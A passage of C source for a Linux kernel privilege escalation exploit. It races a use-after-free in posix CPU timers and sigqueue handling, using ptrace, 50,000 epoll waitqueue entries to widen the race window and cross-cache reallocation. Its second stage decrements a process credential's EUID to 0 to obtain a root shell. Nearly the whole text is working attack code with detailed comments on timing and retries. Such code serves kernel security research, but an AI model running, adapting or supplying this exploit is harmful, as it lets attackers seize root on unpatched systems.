if (parent_owns_uaf_sigqueue) { for (int i = 0; i < getuid(); i++) { SYSCHK(read(sigrt1_sfd, &si, sizeof(si))); } } else { SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 8 SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 9 } printf("\t[+] Exploit finished. Searching for child with EUID 0...\n"); // Now wake up each child process to check which one is root. // If we find the root process, we'll block forever and the child // can launch a shell. for (int i = 0; i < NUM_CRED_PROCS; i++) { SYSCHK(write(cred_parent_pfds[1], &m, 1)); SYSCHK(read(cred_child_pfds[0], &m, 1)); } // If we ever get here, the exploit failed for some reason. printf("[!!!] Exploit failed! I have no idea why XD try again?\n"); } int main(int argc, char *argv[]) { // exploit process char m; // Parent and child setup // Use pipes to communicate between parent and child SYSCHK(pipe(exploit_child_to_parent)); SYSCHK(pipe(exploit_parent_to_child)); pid_t pid = SYSCHK(fork()); if (pid) { // exploit parent process pin_on_cpu(0); close(exploit_child_to_parent[1]); close(exploit_parent_to_child[0]); prctl(PR_SET_NAME, "EXPLOIT_PARENT"); pid_t racer_tid; // Reallocated timer event - use SIGUSR2 as it will be easy to // tell we won the race if we ever receive SIGUSR2 on the child thread. // // Send the signal to ourself specifically, so it uses our pending // list instead of the shared pending list. struct sigevent realloc_evt = {0}; realloc_evt.sigev_notify = SIGEV_SIGNAL | SIGEV_THREAD_ID; realloc_evt.sigev_signo = SIGUSR2; realloc_evt._sigev_un._tid = (pid_t)syscall(SYS_gettid); // realloc_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL; // For debugging // Create SIGUSR2 sfd, and block SIGUSR2 and SIGRTMIN+1 and SIGRTMIN+2 on this process. 
    // ------------------------------------------------------------------
    // PARENT side of the exploit fork (the `if` opening this branch is
    // above this chunk). The parent's job per attempt:
    //   1. ptrace-attach to the child's RACER thread and reap it at just
    //      the right moment (1st race),
    //   2. re-allocate the freed UAF timer and fire it with
    //      `timer_settime(TIMER_ABSTIME)` inside the 2nd race window,
    //   3. adjust `parent_settime_delay` up/down based on which side of
    //      the window it missed.
    // NOTE(review): `m`, `racer_tid`, `pid` and `realloc_evt` are declared
    // before this chunk — confirm their definitions in the omitted part.
    // ------------------------------------------------------------------

    // The parent only needs a SIGUSR2 signalfd (double-insertion check);
    // SIGRTMIN+1/+2 are additionally blocked for the later stages.
    sigset_t block_mask;
    sigemptyset(&block_mask);
    sigaddset(&block_mask, SIGUSR2);
    int sigusr2_sfd = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));
    sigaddset(&block_mask, SIGRTMIN+1);
    sigaddset(&block_mask, SIGRTMIN+2);
    SYSCHK(sigprocmask(SIG_BLOCK, &block_mask, NULL));

    // itimerspec that fires the timer immediately when used with `TIMER_ABSTIME`
    // (absolute time 1ns is always in the past by the time it is armed).
    struct itimerspec fire_ts = {0};
    fire_ts.it_value.tv_nsec = 1;

    int parent_settime_delay = PARENT_SETTIME_DELAY_US;
    // int parent_settime_delay = 200 * 1000; // KERNEL PATCH: 200ms delay

    // Prepare the preallocs for cross-cache for the parent process.
    // NOTE: Must be on CPU 3!
    pin_on_cpu(3);
    sigqueue_crosscache_preallocs();
    pin_on_cpu(0);

    // On a different CPU to the cross-cache CPUs, enqueue a `SIGRTMIN+2` signal.
    // This is used later to leak the task pending list address.
    pid_t my_pid = (pid_t)syscall(SYS_gettid);
    SYSCHK(syscall(__NR_tkill, my_pid, SIGRTMIN+2));

    while (1) {
        // Initially pin to CPU 0.
        pin_on_cpu(0);

        // Reset `realloc_timer` on each try (-1 because timer ID 0 is valid;
        // see the note on the globals above).
        realloc_timer = (void *) -1;

        // Receive child process's RACER thread's TID for reaping later.
        SYSCHK(read(exploit_child_to_parent[0], &racer_tid, sizeof(pid_t))); // sync 1

        // Attach to the RACER thread and continue it.
        SYSCHK(ptrace(PTRACE_ATTACH, racer_tid, NULL, NULL));
        SYSCHK(waitpid(racer_tid, NULL, __WALL));
        SYSCHK(ptrace(PTRACE_CONT, racer_tid, NULL, NULL));

        // Signal to child that we attached and continued.
        SYSCHK(write(exploit_parent_to_child[1], &m, 1)); // sync 2

        // Reap the RACER thread.
        //
        // At this point, this should block while the RACER thread is consuming CPU
        // time. There are three possible outcomes:
        //
        // 1. The RACER thread exits and enters `handle_posix_cpu_timers()` AFTER
        //    `do_exit() -> exit_notify()` has woken us up. `waitpid()` will reap the
        //    RACER thread at that point and allow the timer to be freed.
        //
        // 2. If the RACER thread fires timers too early, then we'll just wake up
        //    after the race window is completely gone.
        //
        // 3. If the RACER thread never fires the timers, we'll also return after the
        //    race window is completely gone.
        SYSCHK(waitpid(racer_tid, NULL, __WALL));

        // Assume we won the race for now. Only the child process can tell us for sure.
        // Child process will be waiting for us to let it know after `waitpid()` returns.
        SYSCHK(write(exploit_parent_to_child[1], &m, 1)); // sync 3

        // Child process `free_func()` thread lets us know when it freed the UAF timer so
        // we can re-allocate it.
        //
        // Ensure to switch to CPU 3 before re-allocating (same CPU as the
        // cross-cache preallocs above).
        pin_on_cpu(3);
        SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 4

        // Either `free_func()` sends us SUCCESS, or the child process main thread sends us FAIL.
        // In the success case, we are potentially in the race window with a freed timer.
        if (m == SUCCESS_CHAR) {
            // At this point, we know that the timers fired, because the SUCCESS_STR is only
            // sent by the `free_func()` thread.
            //
            // But we don't know if we won the 1st race or not.
            //
            // In any case, we re-allocate the UAF timer now, because it prevents hitting the
            // `BUG_ON` in `send_sigqueue()` if the timer was actually freed.
            SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &realloc_evt, &realloc_timer));

            // If we assume we won the race, now `realloc_timer->sigq` is the same as `uaf_timer->sigq`,
            // and `uaf_timer` is currently being handled by `handle_posix_cpu_timers()` via RACER thread.
            //
            // We want to wait a certain amount of time to let the RACER thread enter `send_sigqueue()`
            // with the `uaf_timer->sigq`, and go past the `!list_empty()` check.
            usleep(parent_settime_delay);

            // Once past the `!list_empty()` check in `send_sigqueue()`,
            // the `signalfd_notify()` is going to extend the 2nd race window for us
            // (the child set up ~50,000 epoll waitqueue entries for this).
            //
            // In that 2nd race window, use `timer_settime()` to fire the realloc timer immediately
            // by setting the time in the past, and using `TIMER_ABSTIME`.
            //
            // If we time it just right, the RACER thread's `send_sigqueue()` will be past the
            // `!list_empty()` check, and we'll also get past the check before either thread is
            // able to insert the `sigqueue` into the target task's pending list.
            //
            // At this point, if all of it lined up, this same `sigqueue` will be inserted into both
            // parent and child's pending lists at the same time.
            SYSCHK(timer_settime(realloc_timer, TIMER_ABSTIME, &fire_ts, NULL));

            // The child process will tell us whether it received SIGUSR2 or not. This
            // is how we know whether we won the first race or not.
            SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 5

            // If the child tells us that it didn't receive SIGUSR2, then there are two
            // situations:
            //
            // 1. We lost the 1st race, so the child received NUM_TIMERS+1 SIGUSR1 signals. This
            //    means the child never could have seen the SIGUSR2 signal.
            // 2. We won the 1st race, but we didn't win the 2nd race. This means the child could
            //    have seen the SIGUSR2 signal, but since it says it didn't, it means our timer
            //    fired too early.
            //
            // In the 2nd case, the signal's `overrun` field will be set to 1.
            if (m == FAIL_CHAR) {
                // NOTE: no need to poll here, because we'll have the signal here for sure.
                // After all, we fired it didn't we? :p
                struct signalfd_siginfo si;
                SYSCHK(read(sigusr2_sfd, &si, sizeof(si)));

                // Check for the 2nd case above: did the child receive the SIGUSR2 signal
                // after it was already queued into our pending list?
                if (si.ssi_overrun > 0) {
                    // We queued the SIGUSR2 too early into our pending list, so
                    // increase the `timer_settime()` delay for next time.
                    printf("\t[+] Parent raced too early, readjusting...\n");
                    parent_settime_delay += PARENT_SETTIME_DELAY_US_DELTA;
                } else {
                    // 1st case above, reallocation just failed completely. We
                    // don't need to do anything.
                }
            } else {
                // The child was able to observe the SIGUSR2 signal, which means we won the
                // first race and successfully reallocated the `sigqueue` of the UAF timer.
                //
                // Now, since the child saw the SIGUSR2 signal, we have to check to see if
                // we see the signal too (i.e. double insertion check).
                struct pollfd pfd = { .fd = sigusr2_sfd, .events = POLLIN };
                int ret = poll(&pfd, 1, 1);
                if (ret < 0) {
                    // Some unknown error, pause to debug it.
                    perror("Exploit success path poll");
                    getchar();
                } else if (pfd.revents & POLLIN) {
                    // We got the SIGUSR2 signal too, which means we won both races.

                    // First, let the child know that we succeeded.
                    SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // sync 6.SUCCESS

                    // SUCCESS_COMMENT:
                    // The UAF sigqueue is now in both processes' pending lists, but we don't
                    // know which list the UAF sigqueue's list pointers point into.
                    //
                    // This matters because when we dequeue this signal from the
                    // pending list, two things will happen:
                    //
                    // 1. The sigqueue will be removed from the list that it *thinks*
                    //    it's in.
                    // 2. The other list will still point to the `sigqueue`, but the
                    //    `sigqueue` itself is considered "empty" and thus cannot ever
                    //    be removed from that other list.
                    //
                    // We need to know which list the sigqueue *thinks* it's in, so we can
                    // continuously dequeue it later as much as we want through the other
                    // list (after all, that's the only primitive we have, since only the
                    // task pending list has a reference to this UAF sigqueue).
                    //
                    // To figure this out, first delete the timer, so that dequeueing the
                    // UAF sigqueue later will free it.
                    SYSCHK(timer_delete(realloc_timer));

                    // Now, dequeue the UAF sigqueue. It doesn't matter that we dequeue
                    // it from the parent process, because the UAF sigqueue's own list
                    // pointers determine which list it's going to be removed from.
                    struct signalfd_siginfo si;
                    SYSCHK(read(sigusr2_sfd, &si, sizeof(si)));

                    // At this point, two cases:
                    //
                    // 1. If the UAF sigqueue's list pointers pointed to the parent's list,
                    //    then polling here should time out and not return any pending
                    //    signals (as we just removed it).
                    // 2. If they pointed to the child's list, polling here will still
                    //    return the signal, because the parent still points to it.
                    // (This shadows the outer `ret` on purpose for the nested check.)
                    int ret = poll(&pfd, 1, 1);
                    if (ret > 0 && (pfd.revents & POLLIN)) {
                        // We have the infinitely looping sigqueue in our pending list.
                        // Let the child know via the fail string because we won.
                        SYSCHK(write(exploit_parent_to_child[1], FAIL_STR, 1)); // sync 7.FAIL

                        // Mark this parent as being the owner of the UAF sigqueue.
                        parent_owns_uaf_sigqueue = 1;
                        buggy_pid = (pid_t)syscall(SYS_gettid);
                        printf("\t[+] Freed UAF sigqueue in parent process pid %d\n", buggy_pid);

                        // Initiate stage 2.
                        second_stage_exploit();
                        SYSCHK(write(exploit_parent_to_child[1], FAIL_STR, 1)); // sync 8.FAIL
                    } else if (!ret) {
                        // Timeout, means the `sigqueue` is in the child's list.
                        // Let the child know via the success string.
                        SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // sync 7.SUCCESS

                        // Child will let us know when to continue.
                        SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 1
                        second_stage_exploit();
                    } else {
                        // Unknown error, just pause to debug it.
                        perror("Exploit success path poll 2 unknown error");
                        getchar();
                    }
                } else if (!ret) {
                    // Timeout case: we didn't receive the SIGUSR2 signal, but the
                    // child told us that it did. This means we won the first race
                    // and successfully reallocated over the UAF timer's sigqueue,
                    // but our `timer_settime()` fired too late.
                    //
                    // Adjust the sleep time accordingly to run `timer_settime()`
                    // earlier next time.
                    printf("\t[+] Parent raced too late, readjusting...\n");
                    parent_settime_delay -= PARENT_SETTIME_DELAY_US_DELTA;

                    // Let the child know that we failed.
                    SYSCHK(write(exploit_parent_to_child[1], FAIL_STR, 1)); // sync 6.FAIL
                }
            }
        }

        // Let the child process delete and free the timer, and
        // all threads before retrying.
        SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 9

        // Free `realloc_timer` if it was ever allocated.
        if (realloc_timer != (void *) -1) {
            timer_delete(realloc_timer);
        }
    }

    // UNREACHABLE CODE:
    // Wait for child to exit before exiting.
    waitpid(pid, NULL, __WALL);
    close(exploit_child_to_parent[0]);
    close(exploit_parent_to_child[1]);
    exit(0);
  } else { // exploit child process
    // ------------------------------------------------------------------
    // CHILD side of the exploit fork. Per attempt it spawns the RACER and
    // FREE_TIMER threads, arms the 18 stall timers plus the UAF timer,
    // then polls SIGUSR1/SIGUSR2 signalfds to classify the outcome and
    // drive the parent via the numbered pipe syncs.
    // ------------------------------------------------------------------
    pin_on_cpu(1);
    // Close the parent's pipe ends; the child writes c2p[1] / reads p2c[0].
    close(exploit_child_to_parent[0]);
    close(exploit_parent_to_child[1]);
    exploit_child_pid = (pid_t)syscall(SYS_gettid);

    // Create signalfds, one each for SIGUSR1, SIGUSR2, SIGRTMIN+1, and SIGRTMIN+2.
    sigset_t block_mask;
    sigemptyset(&block_mask);
    sigaddset(&block_mask, SIGUSR1);
    sigusr1_sfds[0] = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));
    sigemptyset(&block_mask);
    sigaddset(&block_mask, SIGUSR2);
    sigusr2_sfds[0] = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));
    sigemptyset(&block_mask);
    sigaddset(&block_mask, SIGRTMIN+1);
    int sigrt1_sfd = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));
    sigemptyset(&block_mask);
    sigaddset(&block_mask, SIGRTMIN+2);
    int sigrt2_sfd = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));

    // Block all the above signals as well for later (they are consumed
    // only through the signalfds).
    sigemptyset(&block_mask);
    sigaddset(&block_mask, SIGUSR1);
    sigaddset(&block_mask, SIGUSR2);
    sigaddset(&block_mask, SIGRTMIN+1);
    sigaddset(&block_mask, SIGRTMIN+2);
    sigprocmask(SIG_BLOCK, &block_mask, NULL);

    // Duplicate the SIGUSR1 and SIGUSR2 sfds, and set up epoll
    // watchers on them. In total, 50,000 waitqueue entries will
    // be created (EPOLL_COUNT * SFD_DUP_COUNT per signal).
    //
    // Credit: Jann Horn:
    // https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html
    int epoll_fds[EPOLL_COUNT];
    for (int i = 0; i < EPOLL_COUNT; i++) {
        epoll_fds[i] = SYSCHK(epoll_create1(EPOLL_CLOEXEC));
    }

    // Duplicate sfds, index 0 is the original.
    for (int i = 1; i < SFD_DUP_COUNT; i++) {
        sigusr1_sfds[i] = SYSCHK(dup(sigusr1_sfds[0]));
        sigusr2_sfds[i] = SYSCHK(dup(sigusr2_sfds[0]));
    }

    // Set up the epoll watchers now.
    struct epoll_event ev = {0};
    ev.events = EPOLLIN;
    for (int i = 0; i < EPOLL_COUNT; i++) {
        for (int j = 0; j < SFD_DUP_COUNT; j++) {
            ev.data.fd = sigusr1_sfds[j];
            SYSCHK(epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, sigusr1_sfds[j], &ev));
            ev.data.fd = sigusr2_sfds[j];
            SYSCHK(epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, sigusr2_sfds[j], &ev));
        }
    }

    // 50,000 waitqueue entries are now set up on the signalfds for
    // `signalfd_notify()` in the kernel later.

    prctl(PR_SET_NAME, "EXPLOIT_CHILD");

    pthread_barrier_init(&barrier, NULL, 2);

    // Thread that will handle freeing the UAF timer.
    pthread_t free_timer_thread;

    // On a different CPU to the cross-cache CPUs, enqueue a `SIGRTMIN+2` signal.
    // This is used later to leak the task pending list address.
    pid_t my_pid = (pid_t)syscall(SYS_gettid);
    SYSCHK(syscall(__NR_tkill, my_pid, SIGRTMIN+2));

    printf("[+] Stage 1 - Attempting to win the race...\n");

    while (1) {
        // printf("Try %d\n", race_retry_count+1);

        // Reset `uaf_timer` before every attempt (-1, not NULL: timer ID 0 is valid).
        uaf_timer = (void *) -1;

        // Drain signalfds as they could have leftover signals from
        // the previous try.
        struct signalfd_siginfo si;
        drain_signalfd(sigusr1_sfds[0]);
        drain_signalfd(sigusr2_sfds[0]);

        // Create the FREE_TIMER and RACER threads.
        SYSCHK(pthread_create(&race_thread, NULL, (void*)race_func, NULL));
        SYSCHK(pthread_create(&free_timer_thread, NULL, (void*)free_func, NULL));

        // Parent process writes to us when attached and continued; use
        // a barrier to continue the RACER thread now.
        SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 2
        pthread_barrier_wait(&barrier); // barrier 1

        // Wait for timers to be created by RACER thread.
        pthread_barrier_wait(&barrier); // barrier 2

        // Arm the timers now, ensuring the first 18 fire before the
        // UAF timer (their expiry is 1ns earlier).
        struct itimerspec ts = {
            .it_interval = {0, 0},
            .it_value = {
                .tv_sec = 0,
                .tv_nsec = ONE_MS_NS - 1,
            },
        };
        for (int i = 0; i < NUM_TIMERS; i++) {
            SYSCHK(timer_settime(stall_timers[i], 0, &ts, NULL));
        }

        // Arm the UAF timer as the latest one.
        ts.it_value.tv_nsec = ONE_MS_NS;
        SYSCHK(timer_settime(uaf_timer, 0, &ts, NULL));

        // Now, let the RACER thread continue.
        pthread_barrier_wait(&barrier); // barrier 3

        // Parent exploit process tells us after `waitpid()` returns.
        SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 3

        // Wait up to 100ms for any signals to be received.
        //
        // NOTE: Depending on how long the race window is, this timeout
        // may need to be longer.
        //
        // In my case, the race window is 24-30ms long, so 100ms is
        // plenty.
        struct pollfd pfds[2] = {
            { .fd = sigusr1_sfds[0], .events = POLLIN },
            { .fd = sigusr2_sfds[0], .events = POLLIN },
        };
        int sigusr1_count = 0;
        int race_won = 0; // NOTE(review): appears unused within this chunk.

        // This is unused normally, but can be used with a kernel
        // patch. See below.
        int poll_timeout = 100;

        // Poll for SIGUSR1 and SIGUSR2.
        for (;;) {
            int ret = poll(pfds, 2, poll_timeout);
            if (!ret) {
                // Timeout case means one of two things:
                //
                // 1. No timers were fired at all.
                // 2. Timers were fired, but the 2nd race was lost, so
                //    we didn't see the reallocated timer's SIGUSR2 signal.
                //
                // In the first case, `sigusr1_count` will be 0; use that
                // to know that we should cancel the `free_timer_thread`,
                // as otherwise it will be running and waiting forever for
                // a signal.
                if (!sigusr1_count) {
                    pthread_cancel(free_timer_thread);
                }

                // In the 2nd case, we'll hit this timeout only if the parent
                // process queued the SIGUSR2 signal on itself before we could
                // enter the 2nd race window (so we failed the `!list_empty()` check).
                //
                // This basically means we didn't receive the SIGUSR2 signal, but
                // also received one less SIGUSR1 signal than we'd expect (because the
                // UAF timer that was supposed to send us the last SIGUSR1 was reallocated).
                //
                // In this case, the `free_func()` thread will have already exited. We
                // just let the parent know.
                //
                // Note: for the first case above, we also let the parent know. That's why
                //       this write is marked with sync 4.FAIL and sync 5.FAIL, since it
                //       handles two separate failure scenarios.
                SYSCHK(write(exploit_child_to_parent[1], FAIL_STR, 1)); // sync 4.FAIL, 5.FAIL
                break;
            } else if (ret > 0 && (pfds[0].revents & POLLIN)) {
                // We got SIGUSR1! Timers fired.
                //
                // Wait for the `free_func()` thread to handle the SIGUSR1
                // signal first before doing anything the first time.
                if (!sigusr1_count)
                    pthread_barrier_wait(&barrier); // barrier 4

                // KERNEL PATCH: change timeout to 1s after SIGUSR1 seen, guarantees
                // that we win the second race.
                // poll_timeout = 1000;

                // Got the SIGUSR1 signal, drain it and increase the count.
                sigusr1_count += drain_signalfd(sigusr1_sfds[0]);
                if (sigusr1_count >= NUM_TIMERS+1) {
                    // Receiving 19 SIGUSR1 signals means the first race failed,
                    // because the parent process failed to reallocate and change
                    // the UAF timer's signal to SIGUSR2.
                    //
                    // The parent process will be waiting for us to let it know
                    // whether the reallocated timer was able to send us the
                    // SIGUSR2 or not. In this case, we failed.
                    //
                    // Let the parent know and exit this poll loop.
                    SYSCHK(write(exploit_child_to_parent[1], FAIL_STR, 1)); // sync 5.FAIL
                    break;
                }
            } else if (ret > 0 && (pfds[1].revents & POLLIN)) {
                // We got SIGUSR2! Race is potentially won, so let's check.

                // Let the parent process know to check for the SIGUSR2 signal.
                SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // sync 5.SUCCESS
                SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 6
                if (m == SUCCESS_CHAR) {
                    // For an explanation of the below steps, ctrl+f for
                    // "SUCCESS_COMMENT:" in this exploit. It explains
                    // how to figure out which list the `sigqueue`'s next
                    // and prev pointers point to (i.e. child or parent process's
                    // pending list).
                    SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 7

                    // Parent tells us whether we have the UAF sigqueue in our pending list or not.
                    if (m == SUCCESS_CHAR) {
                        // We have the signal in our list.
                        //
                        // This is an extremely rare situation, as the race window for this
                        // to occur is so incredibly small.
                        //
                        // If you see "Freed sigqueue in child process" and the exploit fails,
                        // please restart :) because I have never run into this situation, so
                        // the exploit is untested from here on out.
                        parent_owns_uaf_sigqueue = 0;
                        buggy_pid = (pid_t)syscall(SYS_gettid);
                        printf("\t[+] Freed UAF sigqueue in child process pid %d\n", buggy_pid);
                        printf("\t[+] NOTE: The exploit is untested in this state. If you reach here and the exploit fails, please retry :)\n");

                        // Tell the parent to continue the exploit now.
                        SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 1

                        // Parent will tell us to dequeue the SIGRTMIN+2 signal.
                        SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 2

                        // Dequeueing this signal will put the pointer of our task struct's pending list
                        // into the ->prev pointer of the UAF sigqueue.
                        SYSCHK(read(sigrt2_sfd, &si, sizeof(si)));

                        // Let the parent know it can continue.
                        SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 3

                        // Wait for the parent to ask us to dequeue the SIGUSR2 signal now.
                        SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 4

                        // Now dequeue the UAF sigqueue's signal to write its own pointers back into itself.
                        // This will happen because of the `list_del_init()` in `collect_signal()`.
                        //
                        // The parent does this on CPU 2, so we do the same here, and switch back
                        // afterwards.
                        //
                        // NOTE: After this, SIGUSR2 is removed from the task's signal mask, but
                        //       SIGRTMIN+1 stays.
                        pin_on_cpu(2);
                        SYSCHK(read(sigusr2_sfds[0], &si, sizeof(si)));
                        pin_on_cpu(1);

                        // Let the parent know it can continue.
                        SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 5

                        // Parent will let us know when to dequeue the other sigqueue.
                        SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 6

                        // Dequeue the SIGRTMIN+1 signal. This MUST be done on CPU 2 for the
                        // second cross-cache to work.
                        pin_on_cpu(2);
                        SYSCHK(read(sigrt1_sfd, &si, sizeof(si)));
                        pin_on_cpu(1);

                        // Let the parent know it can continue.
                        SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 7

                        // Parent will let us know when to use the arbitrary decrement primitive.
                        SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 8

                        // Arbitrary decrement time! Decrement the target cred's EUID to 0. This process
                        // will have the same UID as the target cred, so we can use that to know
                        // how many times to decrement.
                        for (int i = 0; i < getuid(); i++) {
                            SYSCHK(read(sigrt1_sfd, &si, sizeof(si)));
                        }

                        // Exploit is now finished; let the parent know and block forever.
                        SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 9

                        // This will block forever, parent won't write to us anymore.
                        SYSCHK(read(exploit_parent_to_child[0], &m, 1));
                    } else {
                        // We don't have the signal in our list, parent can
                        // continue the exploit now.
                        //
                        // This will block forever, parent won't write to us anymore.
                        SYSCHK(read(exploit_parent_to_child[0], &m, 1));
                    }
                } else {
                    break; // Failed
                }
            } else {
                // Error, just pause to debug it.
                printf("poll error in main\n");
                getchar();
            }
        }

        // If we got here, our current attempt failed. Update `syscall_loop_times`
        // (wraps at SYSCALL_LOOP_TIMES_MAX to vary the CPU-burn per attempt).
        syscall_loop_times++;
        syscall_loop_times %= SYSCALL_LOOP_TIMES_MAX+1;
        race_retry_count++;

        // Free the stall timers.
        for (int i = 0; i < NUM_TIMERS; i++) {
            timer_delete(stall_timers[i]);
        }

        // Free the UAF timer in case it didn't get deleted.
        if (uaf_timer != (void *) -1) {
            timer_delete(uaf_timer);
        }

        // Either the `free_timer_thread` got a signal and exited
        // normally, or it didn't get a signal and we cancelled
        // it in the poll code above. Either way, we can join it.
        SYSCHK(pthread_join(free_timer_thread, NULL));

        // Signal to parent to try again.
        SYSCHK(write(exploit_child_to_parent[1], "t", 1)); // sync 9
    }

    // UNREACHABLE CODE:
    // Signal to parent to exit.
    SYSCHK(write(exploit_child_to_parent[1], "t", 1));

    // Wait for parent to exit.
    close(exploit_child_to_parent[1]);
    close(exploit_parent_to_child[0]);
    for (int i = 0; i < SFD_DUP_COUNT; i++) {
        close(sigusr2_sfds[i]);
        close(sigusr1_sfds[i]);
    }
    exit(0);
  }
}